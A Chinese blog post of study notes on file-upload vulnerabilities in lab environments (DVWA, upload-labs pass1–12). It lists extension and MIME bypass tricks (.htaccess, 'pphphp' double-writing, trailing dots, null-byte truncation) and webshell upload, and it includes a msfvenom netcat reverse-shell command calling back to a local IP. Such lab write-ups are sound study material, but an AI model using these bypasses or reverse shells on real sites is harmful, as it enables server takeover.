day6.23

已于 2022-06-25 17:34:18 修改
阅读量680 收藏
点赞数
文章标签: 安全 web安全
于 2022-06-24 00:10:16 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_52986156/article/details/125430895
版权

文件上传漏洞危害

1服务器文件被外界浏览导致信息泄露

2恶意脚本被任意执行(篡改网站,执行非法操作,攻击其他网站等.....)

文件上传实验复现:

菜刀和反弹shell的复现

首先上传小马在dvwa

 直接菜刀切入验证添加终端

 反弹shell

首先上传反弹小马

传参dir测试有被解析

 生成反弹木马:msfvenom -p cmd/unix/reverse_netcat LHOST=192.168.2.137 LPROT=5678

 (未完成)。。。。。。。。。。

pass1

删除上传页面的js事件

成功上传phpinfo测试页

验证

pass2

打开源码看到后端允许上传的文件类型抓取数据包更改为对应的其中一种放行请求

 

pass3

同pass2更改文件后缀传入目录

解析需要注意使用include.php?file=

pass4

可利用两种方式一种为黑名单过滤板之外的文件名phps

另一种利用 .htaccess(条件苛刻apache配置有AllowOverride All)

编写文件.h文件

 再把小马改为对应的名字‘aa.jpg’上传即可

pass5抓包利用双写文件漏洞上传

pass5 ‘s’

 pass6    改包文件名‘.phps’

pass7 改包文件名首尾加空格

pass8 抓包文件名结尾加“.”’

pass9改包名双写绕过“pphphp”

pass10双写“php”或者后缀“. .”

pass11双写“php”为pphphp

pass12:00截断的应用

先拦包发送到burp的重发器页面再修改头部请求字段

尽管我们的手中空无一物。
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
work day6.23
EMTEMM的博客
06-23 764
给用户添加权限:sudo vim /etc/sudoers把%admin改为新用户的用户名。sudo usermod -m -d 新的家目录位置 用户名—>修改用户家目录位置。sudo usermod -l 新的用户名 原来的用户名—>修改用户名。sudo usermod -c 描述信息 用户名—>修改用户的描述信息。sudo vim /etc/group ---->存放所有组用户的信息。sudo usermod -g 目标组 用户名—>修改用户的所属组。创建用户:sudo adduser 用户名。
艾瑞 6.23 day03
qq_63771774的博客
06-23 405
1. 程序的执行流程有几种 1). 顺序结构:程序从上到下逐行地执行,中间没有任何判断和跳转。 2). 分支结构 (单路分支, 多路分支): if语句:使用布尔表达式或布尔值作为分支条件来进行分支控制。switch语句:用于对多个整型值进行匹配,从而实现分支控制。 3). 循环结构: 循环语句可以在满足循环条件的情况下,反复执行某一段代码,这段被重复执行的代码被称为循环体。当反复执行这个循环体时,需要在合适的时候把循环条件改为假,从而结束循环,否则循环将一直执行下去,
day6
starmoth的博客
01-07 247
1.读取数据处理后的数据,分割数据 from sklearn.model_selection import GridSearchCV, KFold, train_test_split import pandas as pd import numpy as np from sklearn.metrics import precision_score,roc_auc_score from sklear...
day02
weixin_44240656的博客
01-14 106
一.数据类型转换 1.1自动类型转换(隐式数据类型转换) 将范围小的数据类型转向数据类型大的数据类型 小结:8种基本数据类型的取值范围排序: byte>short>int>long>float>double char>int>long>float>double 1.2强制类型转换(显示数据类型转换) 将范围大的数据类型转向数据类型小的数据类型 强制类型转换的语法: 范围小的数据类型 变量名 = (范围小的数据类型) 被强转的数值 1.3数据类型转
6.23HiUpdateV1.6
07-03
"6.23HiUpdateV1.6" 是一个软件更新版本的标识,根据描述,这个更新发生在6月23日。"HiUpdateV1.6" 可能是某个软件或系统的更新工具,用于提升原有软件的功能、性能或者修复已知问题。在这个特定的版本中,我们可以...
6.23.rar
06-23
很抱歉,但根据您提供的信息,"6.23.rar" 是一个压缩文件,而描述中没有提供任何关于文件内容的具体信息,标签为空,且压缩包子文件只有一个名为 "6.23" 的条目。这样的信息不足以生成详细的IT知识点。通常,一个...
DS3617(6.23引导与系统安装包).zip
07-28
标题中的"DS3617(6.23引导与系统安装包).zip"表明这是一个针对DS3617设备的系统更新包,版本号为6.23。引导部分通常指的是系统的启动加载器,而系统安装包则包含了用于升级或安装设备操作系统的全部文件。在IT领域,...
DS918(6.23引导与系统安装包).zip
07-28
标题“DS918(6.23引导与系统安装包).zip”指的是针对DS918型号设备的固件更新或系统安装程序,而这个程序的版本是6.23,日期可能为2023年6月23日。描述中的重复信息暗示了文件的重要性或强调该文件是用于引导和系统...
Raize 6.23源码版,拿去用吧,不多说了
05-02
**Raize Components 6.23 源码解析** Raize Components 是一款知名的 Delphi 和 C++Builder 开发者工具包,它提供了一系列高级的界面控件,以帮助开发者创建更加美观、功能丰富的应用程序。在提供的压缩包中,我们...
哪个邮箱最安全最好用啊
Zoho_Mail的博客
07-23 1400
Zoho企业邮箱,采用加密技术、反垃圾邮件和病毒保护,支持多因素认证,确保数据安全合规,同时提供易用性集成和移动应用。对公司,电子邮件可能带上商业计划、顾客信息、财务报表等保密信息,泄露可能导致竞争者掌握,危害企业的竞争优势与信誉。邮件炸弹进攻:很多垃圾短信的涌入可能导致邮箱服务器负荷,危害工作邮件的接收和推送,进而影响业务运作。登陆凭据、医疗记录、专利等敏感信息,一旦泄露,可能对个人或企业导致不可逆转的伤害。遵守国际安全标准和法规,如GDPR、HIPAA等,保证用户数据的合法处理和保护。
如何安全的申请SSL证书
2401_86337938的博客
07-22 1552
DV级别的证书只验证域名所有权,OV级别证书除了验证域名所有权外还会验证单位组织信息,EV级别的证书除了验证域名所有权、单位组织信息外还会验证详细组织业务信息。一旦你的证书被批准,你会收到一个包含证书文件的邮件。最后,在选择SSL证书时,也要注意选择受信任的可信根CA颁布的SSL证书,可以先向JoySSL官网工作人员发送自己需要保护的域名,提交自己所需要的证书类型,注册时填写。首先选择在授权的JoySSL提供商或者是受信任的证书颁发机构选择适合的证书类型。详细的公司信息验证,用于银行、电商等敏感行业。
日记审计遵守合规安全要求
m0_66268916的博客
07-24 512
它主要用于帮助组织实时监控与分析各种事件和行为的日志记录,以便检测潜在的安全威胁,了解系统性能和进行故障排除。它可以跟踪系统错误、异常行为和性能问题,使管理员能够迅速定位和解决潜在的技术故障,从而提高系统的可用性和性能。通过各种事件的归一化处理,实现高性能的海量事件存储和检索优化功能,提供高速的事件检索能力、事后的合规性统计分析处理,可对数据进行二次。支持全维度、跨设备、细粒度的关联分析,内置众多的关联规则,支持网络安全攻防检测、合规性检测,客户可轻松实现各资产间的关联分析。
数据库安全:MySQL安全配置,MySQL安全基线检查加固
wangyuxiang946的博客
07-23 2523
MySQL基线检查,基线配置,安全加固
科普文:Linux系统安全加固指南
最新发布
为无为,事无事,味无味。
07-25 997
本指南仅关注安全性和隐私性,而不关注性能,可用性或其他内容。列出的所有命令都将需要root特权。以“$”符号开头的单词表示一个变量,不同终端之间可能会有所不同。选择一个好的Linux发行版有很多因素。避免分发冻结程序包,因为它们在安全更新中通常很落后不使用与Systemd机制的发行版。Systemd包含许多不必要的攻击面;它尝试做的事情远远超出了必要,并且超出了初始化系统应做的事情。使用musl作为默认的C库。
Internxt:适用于Linux开源安全云存储平台
ecscoupon的博客
07-24 1327
有无数的云存储平台为您的文件提供安全可靠的存储空间。可在 Linux 上安装的热门云存储应用程序包括Dropbox、Nextcloud和Google Drive,遗憾的是,后者迄今为止不提供 Linux 客户端。其他自托管选项包括OwnCloud、Pydio Cells、Seafile、Resilio和Syncthing。另一个值得尝试的开源云存储替代方案是Internxt。Internxt总部位于西班牙,是一家总部位于瓦伦西亚的初创公司,创始人为Fran Villalba Segarra。
鸿蒙仓颉语言之【安全密码库crypto4cj】功能示例
m0_70748845的博客
07-24 917
main() {return 0​很多开发朋友不知道需要学习那些鸿蒙技术?鸿蒙开发岗位需要掌握那些核心技术点?为此鸿蒙的开发学习必须要系统性的进行。而网上有关鸿蒙的开发资料非常的少,假如你想学好鸿蒙的应用开发与系统底层开发。你可以参考这份资料,少走很多弯路,节省没必要的麻烦。由两位前阿里高级研发工程师联合打造的《鸿蒙NEXT星河版OpenHarmony开发文档》里面内容包含了(
网站被浏览器提示“不安全”,如何解决
ABCDEFK1234的博客
07-24 590
网站被浏览器提示“不安全”,如何解决
《“微软蓝屏”敲响警钟:网络安全与系统稳定何去何从》
2302_77186925的博客
07-24 1725
“微软蓝屏”事件暴露了网络安全哪些问题
ds918+6.23
09-07
6.23可能是指该设备的型号发布日期或推出的特别事件。 DS918是一台功能强大的网络存储设备,具备多项优点和特点。首先,它具有4个硬盘插槽,可以容纳最多4个硬盘,支持RAID 0、1、5、6等多种存储模式,提供高效、...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值